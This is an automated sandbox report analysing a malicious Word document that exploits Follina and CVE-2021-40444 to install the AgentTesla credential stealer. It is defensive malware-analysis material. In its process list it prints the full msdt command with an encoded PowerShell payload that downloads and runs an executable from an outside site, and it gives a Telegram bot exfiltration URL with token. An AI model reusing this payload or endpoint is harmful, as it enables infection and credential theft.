Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Payment copy_2911022.docx.doc

Overview

General Information

Sample Name:Payment copy_2911022.docx.doc
Analysis ID:770660
MD5:cd3dbd5f1d468da826581361b619b393
SHA1:9d5fc2d99aec7c8c18d8af7267b4a31801fda770
SHA256:1c6189f068ee3870e1d41511bd55c02cef9d98a816a963a26f95ff0b6becea1f
Tags:docdocx
Infos:

Detection

CVE-2021-40444, AgentTesla, Follina CVE-2022-30190
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected AgentTesla
Yara detected AntiVM3
Yara detected Microsoft Office Exploit Follina CVE-2022-30190
Detected CVE-2021-40444 exploit
Snort IDS alert for network traffic
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Telegram RAT
Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for dropped file
Tries to steal Mail credentials (via file / registry access)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses the Telegram API (likely for C&C communication)
May check the online IP address of the machine
Injects a PE file into a foreign processes
.NET source code contains very large array initializations
Contains an external reference to another file
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
.NET source code references suspicious native API functions
.NET source code contains method to dynamically call methods (often used by packers)
Machine Learning detection for dropped file
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Antivirus or Machine Learning detection for unpacked file
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
JA3 SSL client fingerprint seen in connection with other malware
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Compiles C# or VB.Net code
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Internet Provider seen in connection with other malware
Yara detected Credential Stealer
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs DNS queries)
IP address seen in connection with other malware
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found inlined nop instructions (likely shell or obfuscated code)
PE file does not import any functions
Allocates memory with a write watch (potentially for evading sandboxes)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs HTTP gets)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • WINWORD.EXE (PID: 2396 cmdline: "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding MD5: 0B9AB9B9C4DE429473D6450D4297A123)
    • MSOSYNC.EXE (PID: 860 cmdline: C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe MD5: EA19F4A0D18162BE3A0C8DAD249ADE8C)
    • msdt.exe (PID: 4760 cmdline: C:\Windows\system32\msdt.exe" ms-msdt:/ID pcwdIAGNOstIC /SKIp fOrCe /PaRAm "it_rEBRowSEFoRFIlE=#6Aw IT_LaunchMethod=ContextMenu IT_BrowseForFile=4N0$(iEX($(iex('[SYsTeM.text.EnCoDIng]'+[cHAr]58+[chAR]0x3a+'uTf8.gEtString([SyStEm.CoNVErt]'+[chAR]58+[CHAR]0X3a+'FRoMBAse64sTriNg('+[Char]0X22+'U1RPcC1wUm9jRVNTIC1GT1JDZSAtTkFtZSAnbXNkdCc7JDggPSBBZGQtdFlQZSAtTUVtQkVyZEVGSU5pdGlPTiAnW0RsbEltcG9ydCgiVXJMTW9uLmRsbCIsIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgSkcsc3RyaW5nIFVXYSxzdHJpbmcgcFksdWludCBlYyxJbnRQdHIgcnEpOycgLU5BbUUgIlFDIiAtbmFNRVNwYUNFIGd1IC1QYXNzVGhydTsgJDg6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHBzOi8vcHpzcmJsb2cuY29tL3dwLWNvbnRlbnQvdXBsb2Fkcy8yMDEyL1BST01ad0ZwMzg1dlhyTi5leGUiLCIkRW5WOkFQUERBVEFcUFJPTVp3RnAzODV2WHJOLmV4ZSIsMCwwKTtTdGFSVC1zbEVlcCgzKTtJbnZPa0UtSVRlbSAiJGVudjpBUFBEQVRBXFBST01ad0ZwMzg1dlhyTi5leGUiO3N0T3AtUFJPY2VTUyAtZk9SY0UgLW5hbWUgJ3NkaWFnbmhvc3Qn'+[chaR]0x22+'))'))))m3/../../../../../../../../../../../../../../../../.Exe MD5: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4)
  • csc.exe (PID: 348 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\yjsbg2wl\yjsbg2wl.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
    • cvtres.exe (PID: 524 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBBFF.tmp" "c:\Users\user\AppData\Local\Temp\yjsbg2wl\CSCC31FCDA79CE4E0C894720F359978C2.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
  • csc.exe (PID: 1412 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zf01cjt2\zf01cjt2.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
    • cvtres.exe (PID: 404 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC7C7.tmp" "c:\Users\user\AppData\Local\Temp\zf01cjt2\CSCBCE7B9C025BF4B8F8112717E4D466AA3.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
  • csc.exe (PID: 4568 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mnm1snwx\mnm1snwx.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
    • cvtres.exe (PID: 3620 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE5AF.tmp" "c:\Users\user\AppData\Local\Temp\mnm1snwx\CSCC987513427A042F884BC2F5ADDB1C11C.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
  • PROMZwFp385vXrN.exe (PID: 5444 cmdline: "C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe" MD5: 65FACCEC1C27EA47BF295191E93BFF41)
  • PMoZbw.exe (PID: 3300 cmdline: "C:\Users\user\AppData\Roaming\PMoZbw\PMoZbw.exe" MD5: 65FACCEC1C27EA47BF295191E93BFF41)
  • cleanup
{"C2 url": "https://api.telegram.org/bot5187914704:AAHhM5YfeLYR_Ow0fgwMOZKO7je7btbh5DA/sendMessage"}
{"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot5187914704:AAHhM5YfeLYR_Ow0fgwMOZKO7je7btbh5DA/sendMessage?chat_id=1673982758"}
SourceRuleDescriptionAuthorStrings
document.xml.relsEXPL_CVE_2021_40444_Document_Rels_XMLDetects indicators found in weaponized documents that exploit CVE-2021-40444Jeremy Brown / @alteredbytes
  • 0x3f8:$b1: /relationships/oleObject
  • 0x412:$c1: Target="mhtml:http
  • 0x45b:$c2: !x-usc:http
  • 0x49f:$c3: TargetMode="External"
SourceRuleDescriptionAuthorStrings
00000004.00000002.444972338.00000000030C0000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_FollinaYara detected Microsoft Office Exploit Follina / CVE-2022-30190Joe Security
    00000013.00000002.642900479.0000000003EE1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000013.00000002.642900479.0000000003EE1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
        00000013.00000002.642900479.0000000003EE1000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_AgentTesla_d3ac2b2funknownunknown
        • 0x3a3fc:$a13: get_DnsResolver
        • 0x38b09:$a20: get_LastAccessed
        • 0x3ae2a:$a27: set_InternalServerPort
        • 0x3b15f:$a30: set_GuidMasterKey
        • 0x38c1b:$a33: get_Clipboard
        • 0x38c29:$a34: get_Keyboard
        • 0x39ff6:$a35: get_ShiftKeyDown
        • 0x3a007:$a36: get_AltKeyDown
        • 0x38c36:$a37: get_Password
        • 0x39751:$a38: get_PasswordHash
        • 0x3a85e:$a39: get_DefaultCredentials
        00000013.00000002.644029749.000000000411D000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          Click to see the 30 entries
          SourceRuleDescriptionAuthorStrings
          19.2.PMoZbw.exe.3ee9510.1.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            19.2.PMoZbw.exe.3ee9510.1.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
              19.2.PMoZbw.exe.3ee9510.1.unpackMALWARE_Win_AgentTeslaV3AgentTeslaV3 infostealer payloadditekSHen
              • 0x32c2b:$s10: logins
              • 0x326a5:$s11: credential
              • 0x2e90b:$g1: get_Clipboard
              • 0x2e919:$g2: get_Keyboard
              • 0x2e926:$g3: get_Password
              • 0x2fcd6:$g4: get_CtrlKeyDown
              • 0x2fce6:$g5: get_ShiftKeyDown
              • 0x2fcf7:$g6: get_AltKeyDown
              19.2.PMoZbw.exe.3ee9510.1.unpackWindows_Trojan_AgentTesla_d3ac2b2funknownunknown
              • 0x300ec:$a13: get_DnsResolver
              • 0x2e7f9:$a20: get_LastAccessed
              • 0x30b1a:$a27: set_InternalServerPort
              • 0x30e4f:$a30: set_GuidMasterKey
              • 0x2e90b:$a33: get_Clipboard
              • 0x2e919:$a34: get_Keyboard
              • 0x2fce6:$a35: get_ShiftKeyDown
              • 0x2fcf7:$a36: get_AltKeyDown
              • 0x2e926:$a37: get_Password
              • 0x2f441:$a38: get_PasswordHash
              • 0x3054e:$a39: get_DefaultCredentials
              15.2.PROMZwFp385vXrN.exe.3f6e020.1.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                Click to see the 15 entries
                No Sigma rule has matched
                Timestamp:192.168.2.5149.154.167.220497254432851779 12/20/22-14:16:47.588535
                SID:2851779
                Source Port:49725
                Destination Port:443
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.5149.154.167.220497284432851779 12/20/22-14:16:51.990077
                SID:2851779
                Source Port:49728
                Destination Port:443
                Protocol:TCP
                Classtype:A Network Trojan was detected

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: Payment copy_2911022.docx.docReversingLabs: Detection: 41%
                Source: Payment copy_2911022.docx.docVirustotal: Detection: 46%Perma Link
                Source: Payment copy_2911022.docx.docAvira: detected
                Source: C:\Users\user\AppData\Roaming\PMoZbw\PMoZbw.exeReversingLabs: Detection: 37%
                Source: C:\Users\user\AppData\Roaming\PMoZbw\PMoZbw.exeJoe Sandbox ML: detected
                Source: 17.0.PROMZwFp385vXrN.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                Source: 15.2.PROMZwFp385vXrN.exe.3f6e020.1.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot5187914704:AAHhM5YfeLYR_Ow0fgwMOZKO7je7btbh5DA/sendMessage?chat_id=1673982758"}
                Source: PROMZwFp385vXrN.exe.1788.17.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot5187914704:AAHhM5YfeLYR_Ow0fgwMOZKO7je7btbh5DA/sendMessage"}

                Exploits

                barindex
                Source: Yara matchFile source: 00000004.00000002.444972338.00000000030C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.443928624.0000000002F08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.443795153.0000000002D90000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.443908283.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: document.xml.relsExtracted files from sample: mhtml:https://pzsrblog.com/wp-content/uploads/2012/promzwfp385vxr!x-usc:https://pzsrblog.com/wp-content/uploads/2012/promzwfp385vxr
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
                Source: unknownHTTPS traffic detected: 118.27.125.229:443 -> 192.168.2.5:49701 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 118.27.125.229:443 -> 192.168.2.5:49704 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 118.27.125.229:443 -> 192.168.2.5:49718 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 64.185.227.156:443 -> 192.168.2.5:49724 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 64.185.227.156:443 -> 192.168.2.5:49727 version: TLS 1.2
                Source: Binary string: oI4HW.pdbh' source: PROMZwFp385vXrN.exe, 0000000F.00000000.476154274.00000000007B2000.00000002.00000001.01000000.0000000B.sdmp, PMoZbw.exe.17.dr
                Source: Binary string: oI4HW.pdb source: PROMZwFp385vXrN.exe, 0000000F.00000000.476154274.00000000007B2000.00000002.00000001.01000000.0000000B.sdmp, PMoZbw.exe.17.dr

                Software Vulnerabilities

                barindex
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\msdt.exe
                Source: global trafficTCP traffic: 192.168.2.5:49701 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49701
                Source: global trafficTCP traffic: 192.168.2.5:49701 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49701 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49701
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49701
                Source: global trafficTCP traffic: 192.168.2.5:49701 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49701 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49701
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49701
                Source: global trafficTCP traffic: 192.168.2.5:49701 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49701
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49701
                Source: global trafficTCP traffic: 192.168.2.5:49701 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49702 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49702
                Source: global trafficTCP traffic: 192.168.2.5:49702 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49702 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49702
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49702
                Source: global trafficTCP traffic: 192.168.2.5:49702 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49702
                Source: global trafficTCP traffic: 192.168.2.5:49702 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49702
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49702
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49702
                Source: global trafficTCP traffic: 192.168.2.5:49702 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49702
                Source: global trafficTCP traffic: 192.168.2.5:49702 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49702 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49702
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49702
                Source: global trafficTCP traffic: 192.168.2.5:49703 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49703
                Source: global trafficTCP traffic: 192.168.2.5:49703 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49703 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49703
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49703
                Source: global trafficTCP traffic: 192.168.2.5:49703 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49703
                Source: global trafficTCP traffic: 192.168.2.5:49703 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49703
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49703
                Source: global trafficTCP traffic: 192.168.2.5:49703 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49704 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49704
                Source: global trafficTCP traffic: 192.168.2.5:49704 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49704 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49704
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49704
                Source: global trafficTCP traffic: 192.168.2.5:49704 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49704 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49704
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49704
                Source: global trafficTCP traffic: 192.168.2.5:49704 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49704 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49704
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49704
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49704
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49704
                Source: global trafficTCP traffic: 192.168.2.5:49704 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49704 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49704 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49704
                Source: global trafficTCP traffic: 192.168.2.5:49705 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49705
                Source: global trafficTCP traffic: 192.168.2.5:49705 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49705 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49705
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49705
                Source: global trafficTCP traffic: 192.168.2.5:49705 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49705 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49705
                Source: global trafficTCP traffic: 192.168.2.5:49705 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49705
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49705
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49705
                Source: global trafficTCP traffic: 192.168.2.5:49705 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49705 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49705 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49705 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49706 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49706
                Source: global trafficTCP traffic: 192.168.2.5:49706 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49706 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49706
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49706
                Source: global trafficTCP traffic: 192.168.2.5:49706 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49706
                Source: global trafficTCP traffic: 192.168.2.5:49706 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49706
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49706
                Source: global trafficTCP traffic: 192.168.2.5:49706 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49707 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49707
                Source: global trafficTCP traffic: 192.168.2.5:49707 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49707 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49707
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49707
                Source: global trafficTCP traffic: 192.168.2.5:49707 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49707 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49707
                Source: global trafficTCP traffic: 192.168.2.5:49707 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49707
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49707
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49707
                Source: global trafficTCP traffic: 192.168.2.5:49707 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49707 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49707 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49707
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49707
                Source: global trafficTCP traffic: 192.168.2.5:49708 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49708
                Source: global trafficTCP traffic: 192.168.2.5:49708 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49708 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49708
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49708
                Source: global trafficTCP traffic: 192.168.2.5:49708 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49708 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49708
                Source: global trafficTCP traffic: 192.168.2.5:49708 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49708
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49708
                Source: global trafficTCP traffic: 192.168.2.5:49708 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49708
                Source: global trafficTCP traffic: 192.168.2.5:49708 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49709 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49709
                Source: global trafficTCP traffic: 192.168.2.5:49709 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49709 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49709
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49709
                Source: global trafficTCP traffic: 192.168.2.5:49709 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49709 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49709
                Source: global trafficTCP traffic: 192.168.2.5:49709 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49709
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49709
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49709
                Source: global trafficTCP traffic: 192.168.2.5:49709 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49709 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49709 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49709
                Source: global trafficTCP traffic: 192.168.2.5:49709 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49709 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49710 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49710
                Source: global trafficTCP traffic: 192.168.2.5:49710 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49710 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49710
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49710
                Source: global trafficTCP traffic: 192.168.2.5:49710 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49710 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49710
                Source: global trafficTCP traffic: 192.168.2.5:49710 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49710
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49710
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49710
                Source: global trafficTCP traffic: 192.168.2.5:49710 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49710 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49710
                Source: global trafficTCP traffic: 192.168.2.5:49710 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49710 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49710 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49711 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49711
                Source: global trafficTCP traffic: 192.168.2.5:49711 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49711 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49711
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49711
                Source: global trafficTCP traffic: 192.168.2.5:49711 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49711 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49711
                Source: global trafficTCP traffic: 192.168.2.5:49711 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49711
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49711
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49711
                Source: global trafficTCP traffic: 192.168.2.5:49711 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49711 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49711 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49711
                Source: global trafficTCP traffic: 192.168.2.5:49711 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49711 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49712 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49712
                Source: global trafficTCP traffic: 192.168.2.5:49712 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49712 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49712
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49712
                Source: global trafficTCP traffic: 192.168.2.5:49712 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49712 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49712
                Source: global trafficTCP traffic: 192.168.2.5:49712 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49712
